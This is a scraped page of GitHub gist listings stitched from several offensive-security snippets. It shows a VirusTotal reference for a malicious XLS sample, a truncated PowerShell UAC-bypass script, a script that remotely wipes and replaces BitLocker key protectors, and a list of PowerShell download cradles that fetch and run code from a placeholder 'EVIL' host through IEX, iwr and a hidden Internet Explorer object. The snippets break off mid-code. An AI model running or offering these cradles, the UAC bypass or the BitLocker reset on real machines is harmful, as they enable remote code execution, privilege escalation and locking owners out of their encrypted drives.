VT Link: https://www.virustotal.com/gui/file/d9f00024784af858627a44731950ccb50fe3f37bf940ed47ae7b1ca35ac5ceff/detection
SHA256: D9F00024784AF858627A44731950CCB50FE3F37BF940ED47AE7B1CA35AC5CEFF
File Name: 2aKqjPrdo1-7192.xls
mattnotmax mattnotmax
mattifestation
/ XLM_Analysis_Notes.md
Last active
September 13, 2022 19:03
Excel 4 Macro Analysis Notes
chryzsh
/ powershell-uac-always-notify-bypass.ps1
Created
April 28, 2019 22:06
uac bypass for always notify (works on 1903)
This file contains hidden or bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
| $assemblies=( | |
| "System" | |
| ) | |
| $source=@" | |
| using System; | |
| using Microsoft.Win32; | |
| using System.Diagnostics; | |
| namespace Helloworld |
glassdfir
/ remotely_change_bitlocker_creds.ps1
Last active
May 12, 2019 11:19
This file contains hidden or bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
| $BitLocker = Get-WmiObject -ComputerName ComputerX -Namespace "Root\cimv2\Security\MicrosoftVolumeEncryption" -Class "Win32_EncryptableVolume" -Filter "DriveLetter = 'C:'" | |
| $VolumeKeyProtectorIDs = $BitLocker.GetKeyProtectors()|Select-Object VolumeKeyProtectorID | |
| #Let's loop through all of the VolumeKeyProtectorIDs for the C Volume and delete them. | |
| ForEach($ID in $VolumeKeyProtectorIDs){$BitLocker.DeleteKeyProtector($ID)} | |
| #Now that all of the previous Protectors are gone, let's add our own. | |
| #Let's add a new password that only the security team will need to know. | |
| $BitLocker.ProtectKeyWithTPMAndPin("","","BrandNewPassword123") | |
| #As a backup, let's also add a couple of recovery keys just in case noone can find the sticky note with the password. | |
| $BitLocker.ProtectKeyWithNumericalPassword("Primary","555555-555555-555555-555555-555555-555555-555555-555555") | |
| #Adding an additional optional recovery key might be helpful if you have more than one team that might need to gain access. |
This file contains hidden or bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
| # normal download cradle | |
| IEX (New-Object Net.Webclient).downloadstring("http://EVIL/evil.ps1") | |
| # PowerShell 3.0+ | |
| IEX (iwr 'http://EVIL/evil.ps1') | |
| # hidden IE com object | |
| $ie=New-Object -comobject InternetExplorer.Application;$ie.visible=$False;$ie.navigate('http://EVIL/evil.ps1');start-sleep -s 5;$r=$ie.Document.body.innerHTML;$ie.quit();IEX $r | |
| # Msxml2.XMLHTTP COM object |